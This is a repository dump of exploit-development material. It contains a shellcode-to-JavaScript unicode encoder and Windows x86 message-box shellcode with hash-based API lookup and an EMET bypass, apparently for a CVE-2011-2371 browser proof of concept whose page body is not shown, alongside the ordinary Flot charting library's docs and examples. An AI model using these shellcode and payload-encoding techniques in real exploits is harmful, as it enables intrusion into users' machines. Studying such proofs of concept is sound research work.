├── cve-2011-2371 ├── bin2uni.py ├── jspack.js ├── poc.w7.html ├── w32-msgbox-shellcode-hash-list.asm └── w32-msgbox-shellcode.asm ├── ff-hashleak ├── flot │ ├── API.txt │ ├── FAQ.txt │ ├── LICENSE.txt │ ├── Makefile │ ├── NEWS.txt │ ├── PLUGINS.txt │ ├── README.txt │ ├── examples │ │ ├── ajax.html │ │ ├── annotating.html │ │ ├── arrow-down.gif │ │ ├── arrow-left.gif │ │ ├── arrow-right.gif │ │ ├── arrow-up.gif │ │ ├── basic.html │ │ ├── data-eu-gdp-growth-1.json │ │ ├── data-eu-gdp-growth-2.json │ │ ├── data-eu-gdp-growth-3.json │ │ ├── data-eu-gdp-growth-4.json │ │ ├── data-eu-gdp-growth-5.json │ │ ├── data-eu-gdp-growth.json │ │ ├── data-japan-gdp-growth.json │ │ ├── data-usa-gdp-growth.json │ │ ├── graph-types.html │ │ ├── hs-2004-27-a-large_web.jpg │ │ ├── image.html │ │ ├── index.html │ │ ├── interacting-axes.html │ │ ├── interacting.html │ │ ├── layout.css │ │ ├── multiple-axes.html │ │ ├── navigate.html │ │ ├── percentiles.html │ │ ├── pie.html │ │ ├── realtime.html │ │ ├── resize.html │ │ ├── selection.html │ │ ├── setting-options.html │ │ ├── stacking.html │ │ ├── symbols.html │ │ ├── thresholding.html │ │ ├── time.html │ │ ├── tracking.html │ │ ├── turning-series.html │ │ ├── visitors.html │ │ └── zooming.html │ ├── excanvas.js │ ├── excanvas.min.js │ ├── jquery.colorhelpers.js │ ├── jquery.colorhelpers.min.js │ ├── jquery.flot.crosshair.js │ ├── jquery.flot.crosshair.min.js │ ├── jquery.flot.fillbetween.js │ ├── jquery.flot.fillbetween.min.js │ ├── jquery.flot.image.js │ ├── jquery.flot.image.min.js │ ├── jquery.flot.js │ ├── jquery.flot.min.js │ ├── jquery.flot.navigate.js │ ├── jquery.flot.navigate.min.js │ ├── jquery.flot.pie.js │ ├── jquery.flot.pie.min.js │ ├── jquery.flot.resize.js │ ├── jquery.flot.resize.min.js │ ├── jquery.flot.selection.js │ ├── jquery.flot.selection.min.js │ ├── jquery.flot.stack.js │ ├── jquery.flot.stack.min.js │ ├── jquery.flot.symbol.js │ ├── jquery.flot.symbol.min.js │ ├── jquery.flot.threshold.js │ ├── jquery.flot.threshold.min.js │ ├── jquery.js │ └── jquery.min.js ├── lol.html ├── readme.txt ├── style.css ├── uint.js ├── underscore-min.js └── utils.js ├── jit-ff-4.0.1 ├── _how_to.jpg ├── jit.html ├── readme.txt └── shell0.txt └── osx.dyld.rop ├── README ├── makefile ├── precompiled.txt ├── sc.asm └── x64_shellcode.asm /cve-2011-2371/bin2uni.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | if __name__=="__main__": 4 | if len(sys.argv)<2: 5 | print sys.argv[0], "" 6 | sys.exit(1) 7 | 8 | f = open(sys.argv[1], "rb") 9 | b = f.read() 10 | f.close() 11 | 12 | if len(b)%2==1: 13 | b = b+"\x90" 14 | 15 | l = [] 16 | for i in range(len(b)/2): 17 | c1 = ord(b[2*i]) 18 | c2 = ord(b[2*i+1]) 19 | o = "%%u%02x%02x"%(c2,c1) 20 | l.append(o) 21 | 22 | s = "".join(l) 23 | print s 24 | -------------------------------------------------------------------------------- /cve-2011-2371/jspack.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/cve-2011-2371/jspack.js -------------------------------------------------------------------------------- /cve-2011-2371/poc.w7.html: -------------------------------------------------------------------------------- 1 | 15 | 16 | 17 | 18 | 329 | 330 | 331 | 332 |

333 |

334 | 335 | 336 | 337 | 338 | -------------------------------------------------------------------------------- /cve-2011-2371/w32-msgbox-shellcode-hash-list.asm: -------------------------------------------------------------------------------- 1 | ;-- Hash function configuration -------------------------------------------- 2 | hash_ror_value equ 0x01 3 | ;-- Function hashes -------------------------------------------------------- 4 | hash_kernel32_LoadLibraryA equ 0x1AAA 5 | hash_user32_MessageBoxA equ 0xB62A 6 | ;-- Warnings --------------------------------------------------------------- 7 | -------------------------------------------------------------------------------- /cve-2011-2371/w32-msgbox-shellcode.asm: -------------------------------------------------------------------------------- 1 | ; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever 2 | ; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/ 3 | ; All rights reserved. See COPYRIGHT.txt for details. 4 | BITS 32 5 | ; Windows x86 null-free shellcode that executes calc.exe. 6 | ; Works in any application for Windows 5.0-7.0 all service packs. 7 | ; (See http://skypher.com/wiki/index.php/Hacking/Shellcode). 8 | ; This version uses 16-bit hashes. 9 | 10 | %include 'w32-msgbox-shellcode-hash-list.asm' 11 | 12 | %define B2W(b1,b2) (((b2) << 8) + (b1)) 13 | %define W2DW(w1,w2) (((w2) << 16) + (w1)) 14 | %define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1)) 15 | 16 | %ifdef STACK_ALIGN 17 | AND SP, 0xFFFC 18 | %endif 19 | find_hash: ; Find ntdll's InInitOrder list of modules: 20 | XOR ESI, ESI ; ESI = 0 21 | %ifndef DEFEAT_EAF 22 | PUSH ESI ; Stack = 0 23 | %endif 24 | MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30]) 25 | MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr 26 | MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module) 27 | 28 | %ifdef DEFEAT_EAF 29 | ; The first loaded module is ntdll on x86 systems and ntdll32 on x64 systems. Both modules have this code: 30 | ; ntdll32!RtlGetCurrentPeb () 31 | ; 64a118000000 mov eax,dword ptr fs:[00000018h] 32 | ; 8b4030 mov eax,dword ptr [eax+30h] 33 | ; c3 ret 34 | %define MEMORY_READER_OFFSET 0x30 35 | MOV EDX, [ESI + 0x08] ; EDX = InInitOrder[X].base_address == module 36 | MOVZX EBP, WORD [EDX + 0x3C] ; EBX = module->pe_header_offset 37 | ADD EDX, [EDX + EBP + 0x2C] ; EDX = module + module.pe_header->code_offset == module code 38 | MOV DH, 0xF ; The EAF breakpoints are in tables that are at the start of ntdll, 39 | ; so we can avoid them easily... 40 | scan_for_memory_reader: 41 | INC EDX 42 | CMP DWORD [EDX], 0xC330408B ; EDX => MOV EAX, [EAX+30], RET ? 43 | JNE scan_for_memory_reader 44 | PUSH EDX ; Save &(MOV EAX, [EAX+30], RET) 45 | %endif 46 | 47 | next_module: ; Get the baseaddress of the current module and find the next module: 48 | MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address 49 | MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1] 50 | get_proc_address_loop: ; Find the PE header and export and names tables of the module: 51 | MOV EBX, [EBP + 0x3C] ; EBX = &(PE header) 52 | MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table) 53 | ADD EBX, EBP ; EBX = &(export table) 54 | MOV ECX, [EBX + 0x18] ; ECX = number of name pointers 55 | JCXZ next_module ; No name pointers? Next module. 56 | next_function_loop: ; Get the next function name for hashing: 57 | MOV EDI, [EBX + 0x20] ; EDI = offset(names table) 58 | ADD EDI, EBP ; EDI = &(names table) 59 | MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name) 60 | ADD EDI, EBP ; EDI = &(function name) 61 | XOR EAX, EAX ; EAX = 0 62 | CDQ ; EDX = 0 63 | hash_loop: ; Hash the function name and compare with requested hash 64 | XOR DL, [EDI] 65 | ROR DX, BYTE hash_ror_value 66 | SCASB 67 | JNE hash_loop 68 | CMP DX, hash_user32_MessageBoxA 69 | JE found_MessageBoxA ; 70 | CMP DX, hash_kernel32_LoadLibraryA 71 | LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function 72 | JNE next_module ; Not the right hash and no functions left in module? Next module 73 | found_MessageBoxA: 74 | ; Found the right hash: get the address of the function: 75 | MOV EDX, [EBX + 0x24] ; EDX = offset ordinals table 76 | ADD EDX, EBP ; EDX = &oridinals table 77 | MOVZX EDX, WORD [EDX + 2 * ECX] ; EDX = ordinal number of function 78 | %ifdef DEFEAT_EAF 79 | XCHG EAX, EDI ; EDI = 0 80 | LEA EAX, [EBX + 0x1C - MEMORY_READER_OFFSET] ; EAX = &offset address table - MEMORY_READER_OFFSET 81 | POP ECX ; ECX = &(ntdll:MOV EAX, [EAX+30], RET) 82 | CALL ECX ; EAX = [EAX + 0x30] == [&offset address table] == offset address table 83 | XCHG EAX, EDI ; EDI = offset address table, EAX = 0 84 | PUSH EAX ; Stack = 0 85 | %else 86 | MOV EDI, [EBX + 0x1C] ; EDI = offset address table 87 | %endif 88 | ADD EDI, EBP ; EDI = &address table 89 | ADD EBP, [EDI + 4 * EDX] ; EBP = &(function) 90 | TEST ESI, ESI 91 | JZ message_box 92 | 93 | load_library: ; Stack = 0 (two ways of setting it, depding on DEFEAT_EAF) 94 | PUSH B2DW('3', '2', ' ', ' ') ; Stack = "er32", 0 95 | PUSH B2DW('u', 's', 'e', 'r') ; Stack = " user32", 0 96 | PUSH ESP ; Stack = &(" user32"), " user32", 0 97 | %ifdef DEFEAT_EAF 98 | ; We will need to put a copy of &(ntdll:MOV EAX, [EAX+30], RET) back on the stack for the next function: 99 | XCHG ECX, [ESP] ; Stack = &(ntdll:MOV EAX, [EAX+30], RET), ECX = &(" user32") 100 | PUSH ECX ; Stack = &(" user32"), &(ntdll:MOV EAX, [EAX+30], RET), " user32", 0 101 | %endif 102 | CALL EBP ; LoadLibraryA(&(" user32")); 103 | XCHG EAX, EBP ; EBP = &(user32.dll) 104 | XOR ESI, ESI ; ESI = 0 105 | JMP get_proc_address_loop 106 | 107 | message_box: 108 | ; create the "Hello world!" string 109 | %ifndef DEFEAT_EAF 110 | PUSH ESI ; Stack = 0 111 | %endif 112 | PUSH B2DW('1', '!', 0, 0) ; Stack = "rld!", 0 113 | PUSH B2DW('-', '2', '3', '7') ; Stack = "rld!", 0 114 | PUSH B2DW('2', '0', '1', '1') ; Stack = "o world!", 0 115 | PUSH B2DW('c', 'v', 'e', '-') ; Stack = "Hello world!", 0 116 | PUSH ESP ; Stack = &("Hello world!"), "Hello world!", 0 117 | XCHG EAX, [ESP] ; Stack = 0, "Hello world!", 0 118 | PUSH EAX ; Stack = &("Hello world!"), 0, "Hello world!", 0 119 | PUSH EAX ; Stack = &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0 120 | PUSH ESI ; Stack = 0, &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0 121 | CALL EBP ; MessageBoxA(NULL, &("Hello world!"), &("Hello world!"), MB_OK); 122 | INT3 ; Crash 123 | -------------------------------------------------------------------------------- /ff-hashleak/flot/FAQ.txt: -------------------------------------------------------------------------------- 1 | Frequently asked questions 2 | -------------------------- 3 | 4 | Q: How much data can Flot cope with? 5 | 6 | A: Flot will happily draw everything you send to it so the answer 7 | depends on the browser. The excanvas emulation used for IE (built with 8 | VML) makes IE by far the slowest browser so be sure to test with that 9 | if IE users are in your target group. 10 | 11 | 1000 points is not a problem, but as soon as you start having more 12 | points than the pixel width, you should probably start thinking about 13 | downsampling/aggregation as this is near the resolution limit of the 14 | chart anyway. If you downsample server-side, you also save bandwidth. 15 | 16 | 17 | Q: Flot isn't working when I'm using JSON data as source! 18 | 19 | A: Actually, Flot loves JSON data, you just got the format wrong. 20 | Double check that you're not inputting strings instead of numbers, 21 | like [["0", "-2.13"], ["5", "4.3"]]. This is most common mistake, and 22 | the error might not show up immediately because Javascript can do some 23 | conversion automatically. 24 | 25 | 26 | Q: Can I export the graph? 27 | 28 | A: This is a limitation of the canvas technology. There's a hook in 29 | the canvas object for getting an image out, but you won't get the tick 30 | labels. And it's not likely to be supported by IE. At this point, your 31 | best bet is probably taking a screenshot, e.g. with PrtScn. 32 | 33 | 34 | Q: The bars are all tiny in time mode? 35 | 36 | A: It's not really possible to determine the bar width automatically. 37 | So you have to set the width with the barWidth option which is NOT in 38 | pixels, but in the units of the x axis (or the y axis for horizontal 39 | bars). For time mode that's milliseconds so the default value of 1 40 | makes the bars 1 millisecond wide. 41 | 42 | 43 | Q: Can I use Flot with libraries like Mootools or Prototype? 44 | 45 | A: Yes, Flot supports it out of the box and it's easy! Just use jQuery 46 | instead of $, e.g. call jQuery.plot instead of $.plot and use 47 | jQuery(something) instead of $(something). As a convenience, you can 48 | put in a DOM element for the graph placeholder where the examples and 49 | the API documentation are using jQuery objects. 50 | 51 | Depending on how you include jQuery, you may have to add one line of 52 | code to prevent jQuery from overwriting functions from the other 53 | libraries, see the documentation in jQuery ("Using jQuery with other 54 | libraries") for details. 55 | 56 | 57 | Q: Flot doesn't work with [insert name of Javascript UI framework]! 58 | 59 | A: The only non-standard thing used by Flot is the canvas tag; 60 | otherwise it is simply a series of absolute positioned divs within the 61 | placeholder tag you put in. If this is not working, it's probably 62 | because the framework you're using is doing something weird with the 63 | DOM, or you're using it the wrong way. 64 | 65 | A common problem is that there's display:none on a container until the 66 | user does something. Many tab widgets work this way, and there's 67 | nothing wrong with it - you just can't call Flot inside a display:none 68 | container as explained in the README so you need to hold off the Flot 69 | call until the container is actually displayed (or use 70 | visibility:hidden instead of display:none or move the container 71 | off-screen). 72 | 73 | If you find there's a specific thing we can do to Flot to help, feel 74 | free to submit a bug report. Otherwise, you're welcome to ask for help 75 | on the forum/mailing list, but please don't submit a bug report to 76 | Flot. 77 | -------------------------------------------------------------------------------- /ff-hashleak/flot/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2007-2009 IOLA and Ole Laursen 2 | 3 | Permission is hereby granted, free of charge, to any person 4 | obtaining a copy of this software and associated documentation 5 | files (the "Software"), to deal in the Software without 6 | restriction, including without limitation the rights to use, 7 | copy, modify, merge, publish, distribute, sublicense, and/or sell 8 | copies of the Software, and to permit persons to whom the 9 | Software is furnished to do so, subject to the following 10 | conditions: 11 | 12 | The above copyright notice and this permission notice shall be 13 | included in all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 16 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES 17 | OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 18 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT 19 | HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, 20 | WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 21 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | -------------------------------------------------------------------------------- /ff-hashleak/flot/Makefile: -------------------------------------------------------------------------------- 1 | # Makefile for generating minified files 2 | 3 | .PHONY: all 4 | 5 | # we cheat and process all .js files instead of an exhaustive list 6 | all: $(patsubst %.js,%.min.js,$(filter-out %.min.js,$(wildcard *.js))) 7 | 8 | %.min.js: %.js 9 | yui-compressor $< -o $@ 10 | -------------------------------------------------------------------------------- /ff-hashleak/flot/PLUGINS.txt: -------------------------------------------------------------------------------- 1 | Writing plugins 2 | --------------- 3 | 4 | All you need to do to make a new plugin is creating an init function 5 | and a set of options (if needed), stuffing it into an object and 6 | putting it in the $.plot.plugins array. For example: 7 | 8 | function myCoolPluginInit(plot) { 9 | plot.coolstring = "Hello!"; 10 | }; 11 | 12 | $.plot.plugins.push({ init: myCoolPluginInit, options: { ... } }); 13 | 14 | // if $.plot is called, it will return a plot object with the 15 | // attribute "coolstring" 16 | 17 | Now, given that the plugin might run in many different places, it's 18 | a good idea to avoid leaking names. The usual trick here is wrap the 19 | above lines in an anonymous function which is called immediately, like 20 | this: (function () { inner code ... })(). To make it even more robust 21 | in case $ is not bound to jQuery but some other Javascript library, we 22 | can write it as 23 | 24 | (function ($) { 25 | // plugin definition 26 | // ... 27 | })(jQuery); 28 | 29 | There's a complete example below, but you should also check out the 30 | plugins bundled with Flot. 31 | 32 | 33 | Complete example 34 | ---------------- 35 | 36 | Here is a simple debug plugin which alerts each of the series in the 37 | plot. It has a single option that control whether it is enabled and 38 | how much info to output: 39 | 40 | (function ($) { 41 | function init(plot) { 42 | var debugLevel = 1; 43 | 44 | function checkDebugEnabled(plot, options) { 45 | if (options.debug) { 46 | debugLevel = options.debug; 47 | 48 | plot.hooks.processDatapoints.push(alertSeries); 49 | } 50 | } 51 | 52 | function alertSeries(plot, series, datapoints) { 53 | var msg = "series " + series.label; 54 | if (debugLevel > 1) 55 | msg += " with " + series.data.length + " points"; 56 | alert(msg); 57 | } 58 | 59 | plot.hooks.processOptions.push(checkDebugEnabled); 60 | } 61 | 62 | var options = { debug: 0 }; 63 | 64 | $.plot.plugins.push({ 65 | init: init, 66 | options: options, 67 | name: "simpledebug", 68 | version: "0.1" 69 | }); 70 | })(jQuery); 71 | 72 | We also define "name" and "version". It's not used by Flot, but might 73 | be helpful for other plugins in resolving dependencies. 74 | 75 | Put the above in a file named "jquery.flot.debug.js", include it in an 76 | HTML page and then it can be used with: 77 | 78 | $.plot($("#placeholder"), [...], { debug: 2 }); 79 | 80 | This simple plugin illustrates a couple of points: 81 | 82 | - It uses the anonymous function trick to avoid name pollution. 83 | - It can be enabled/disabled through an option. 84 | - Variables in the init function can be used to store plot-specific 85 | state between the hooks. 86 | 87 | The two last points are important because there may be multiple plots 88 | on the same page, and you'd want to make sure they are not mixed up. 89 | 90 | 91 | Shutting down a plugin 92 | ---------------------- 93 | 94 | Each plot object has a shutdown hook which is run when plot.shutdown() 95 | is called. This usually mostly happens in case another plot is made on 96 | top of an existing one. 97 | 98 | The purpose of the hook is to give you a chance to unbind any event 99 | handlers you've registered and remove any extra DOM things you've 100 | inserted. 101 | 102 | The problem with event handlers is that you can have registered a 103 | handler which is run in some point in the future, e.g. with 104 | setTimeout(). Meanwhile, the plot may have been shutdown and removed, 105 | but because your event handler is still referencing it, it can't be 106 | garbage collected yet, and worse, if your handler eventually runs, it 107 | may overwrite stuff on a completely different plot. 108 | 109 | 110 | Some hints on the options 111 | ------------------------- 112 | 113 | Plugins should always support appropriate options to enable/disable 114 | them because the plugin user may have several plots on the same page 115 | where only one should use the plugin. In most cases it's probably a 116 | good idea if the plugin is turned off rather than on per default, just 117 | like most of the powerful features in Flot. 118 | 119 | If the plugin needs options that are specific to each series, like the 120 | points or lines options in core Flot, you can put them in "series" in 121 | the options object, e.g. 122 | 123 | var options = { 124 | series: { 125 | downsample: { 126 | algorithm: null, 127 | maxpoints: 1000 128 | } 129 | } 130 | } 131 | 132 | Then they will be copied by Flot into each series, providing default 133 | values in case none are specified. 134 | 135 | Think hard and long about naming the options. These names are going to 136 | be public API, and code is going to depend on them if the plugin is 137 | successful. 138 | -------------------------------------------------------------------------------- /ff-hashleak/flot/README.txt: -------------------------------------------------------------------------------- 1 | About 2 | ----- 3 | 4 | Flot is a Javascript plotting library for jQuery. Read more at the 5 | website: 6 | 7 | http://code.google.com/p/flot/ 8 | 9 | Take a look at the examples linked from above, they should give a good 10 | impression of what Flot can do and the source code of the examples is 11 | probably the fastest way to learn how to use Flot. 12 | 13 | 14 | Installation 15 | ------------ 16 | 17 | Just include the Javascript file after you've included jQuery. 18 | 19 | Generally, all browsers that support the HTML5 canvas tag are 20 | supported. 21 | 22 | For support for Internet Explorer < 9, you can use Excanvas, a canvas 23 | emulator; this is used in the examples bundled with Flot. You just 24 | include the excanvas script like this: 25 | 26 | 27 | 28 | If it's not working on your development IE 6.0, check that it has 29 | support for VML which Excanvas is relying on. It appears that some 30 | stripped down versions used for test environments on virtual machines 31 | lack the VML support. 32 | 33 | You can also try using Flashcanvas (see 34 | http://code.google.com/p/flashcanvas/), which uses Flash to do the 35 | emulation. Although Flash can be a bit slower to load than VML, if 36 | you've got a lot of points, the Flash version can be much faster 37 | overall. Flot contains some wrapper code for activating Excanvas which 38 | Flashcanvas is compatible with. 39 | 40 | You need at least jQuery 1.2.6, but try at least 1.3.2 for interactive 41 | charts because of performance improvements in event handling. 42 | 43 | 44 | Basic usage 45 | ----------- 46 | 47 | Create a placeholder div to put the graph in: 48 | 49 |

50 | 51 | You need to set the width and height of this div, otherwise the plot 52 | library doesn't know how to scale the graph. You can do it inline like 53 | this: 54 | 55 |

56 | 57 | You can also do it with an external stylesheet. Make sure that the 58 | placeholder isn't within something with a display:none CSS property - 59 | in that case, Flot has trouble measuring label dimensions which 60 | results in garbled looks and might have trouble measuring the 61 | placeholder dimensions which is fatal (it'll throw an exception). 62 | 63 | Then when the div is ready in the DOM, which is usually on document 64 | ready, run the plot function: 65 | 66 | $.plot($("#placeholder"), data, options); 67 | 68 | Here, data is an array of data series and options is an object with 69 | settings if you want to customize the plot. Take a look at the 70 | examples for some ideas of what to put in or look at the reference 71 | in the file "API.txt". Here's a quick example that'll draw a line from 72 | (0, 0) to (1, 1): 73 | 74 | $.plot($("#placeholder"), [ [[0, 0], [1, 1]] ], { yaxis: { max: 1 } }); 75 | 76 | The plot function immediately draws the chart and then returns a plot 77 | object with a couple of methods. 78 | 79 | 80 | What's with the name? 81 | --------------------- 82 | 83 | First: it's pronounced with a short o, like "plot". Not like "flawed". 84 | 85 | So "Flot" rhymes with "plot". 86 | 87 | And if you look up "flot" in a Danish-to-English dictionary, some up 88 | the words that come up are "good-looking", "attractive", "stylish", 89 | "smart", "impressive", "extravagant". One of the main goals with Flot 90 | is pretty looks. 91 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/ajax.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

Example of loading data dynamically with AJAX. Percentage change in GDP (source: Eurostat). Click the buttons below.

17 | 18 |

The data is fetched over HTTP, in this case directly from text 19 | files. Usually the URL would point to some web server handler 20 | (e.g. a PHP page or Java/.NET/Python/Ruby on Rails handler) that 21 | extracts it from a database and serializes it to JSON.

22 | 23 |

24 | - 25 | data - 26 | 27 |

28 | 29 |

30 | - 31 | data - 32 | 33 |

34 | 35 |

36 | - 37 | data - 38 | 39 |

40 | 41 |

If you combine AJAX with setTimeout, you can poll the server 42 | for new data.

43 | 44 |

45 | 46 |

47 | 48 | 141 | 142 | 143 | 144 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/annotating.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

Flot has support for simple background decorations such as 17 | lines and rectangles. They can be useful for marking up certain 18 | areas. You can easily add any HTML you need with standard DOM 19 | manipulation, e.g. for labels. For drawing custom shapes there is 20 | also direct access to the canvas.

21 | 22 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/arrow-down.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/ff-hashleak/flot/examples/arrow-down.gif -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/arrow-left.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/ff-hashleak/flot/examples/arrow-left.gif -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/arrow-right.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/ff-hashleak/flot/examples/arrow-right.gif -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/arrow-up.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/ff-hashleak/flot/examples/arrow-up.gif -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/basic.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

Simple example. You don't need to specify much to get an 17 | attractive look. Put in a placeholder, make sure you set its 18 | dimensions (otherwise the plot library will barf) and call the 19 | plot function with the data. The axes are automatically 20 | scaled.

21 | 22 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth-1.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth-2.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9], [2001, 2.0], [2002, 1.2]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth-3.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9], [2001, 2.0], [2002, 1.2], [2003, 1.3], [2004, 2.5]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth-4.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9], [2001, 2.0], [2002, 1.2], [2003, 1.3], [2004, 2.5], [2005, 2.0], [2006, 3.1]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth-5.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9], [2001, 2.0], [2002, 1.2], [2003, 1.3], [2004, 2.5], [2005, 2.0], [2006, 3.1], [2007, 2.9], [2008, 0.9]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-eu-gdp-growth.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Europe (EU27)", 3 | "data": [[1999, 3.0], [2000, 3.9], [2001, 2.0], [2002, 1.2], [2003, 1.3], [2004, 2.5], [2005, 2.0], [2006, 3.1], [2007, 2.9], [2008, 0.9]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-japan-gdp-growth.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "Japan", 3 | "data": [[1999, -0.1], [2000, 2.9], [2001, 0.2], [2002, 0.3], [2003, 1.4], [2004, 2.7], [2005, 1.9], [2006, 2.0], [2007, 2.3], [2008, -0.7]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/data-usa-gdp-growth.json: -------------------------------------------------------------------------------- 1 | { 2 | "label": "USA", 3 | "data": [[1999, 4.4], [2000, 3.7], [2001, 0.8], [2002, 1.6], [2003, 2.5], [2004, 3.6], [2005, 2.9], [2006, 2.8], [2007, 2.0], [2008, 1.1]] 4 | } 5 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/graph-types.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

Flot supports lines, points, filled areas, bars and any 17 | combinations of these, in the same plot and even on the same data 18 | series.

19 | 20 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/hs-2004-27-a-large_web.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/ff-hashleak/flot/examples/hs-2004-27-a-large_web.jpg -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/image.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |

Flot Examples

14 | 15 |

16 | 17 |

The Cat's Eye Nebula (picture from Hubble).

18 | 19 |

With the image plugin, you can plot images. This is for example 20 | useful for getting ticks on complex prerendered visualizations. 21 | Instead of inputting data points, you put in the images and where 22 | their two opposite corners are supposed to be in plot space.

23 | 24 |

Images represent a little further complication because you need 25 | to make sure they are loaded before you can use them (Flot skips 26 | incomplete images). The plugin comes with a couple of helpers 27 | for doing that.

28 | 29 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 |

Flot Examples

10 | 11 |

Here are some examples for Flot, the Javascript charting library for jQuery:

12 | 13 |

Basic example
Different graph types
Setting various options and annotating a chart
Updating graphs with AJAX and real-time updates

19 | 20 |

Being interactive:

21 | 22 |

Turning series on/off
Rectangular selection support and zooming and zooming with overview (both with selection plugin)
Interacting with the data points
Panning and zooming (with navigation plugin)
Automatically redraw when window is resized (with resize plugin)

29 | 30 |

Various features:

31 | 32 |

Using other symbols than circles for points (with symbol plugin)
Plotting time series and visitors per day with zooming and weekends (with selection plugin)
Multiple axes and interacting with the axes
Thresholding the data (with threshold plugin)
Stacked charts (with stacking plugin)
Using filled areas to plot percentiles (with fillbetween plugin)
Tracking curves with crosshair (with crosshair plugin)
Plotting prerendered images (with image plugin)
Pie charts (with pie plugin)

43 | 44 | 45 | -------------------------------------------------------------------------------- /ff-hashleak/flot/examples/interacting-axes.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Flot Examples 6 | 7 | 8 | 9 | 10 | 11 | 12 |

Flot Examples

13 | 14 |

15 | 16 |

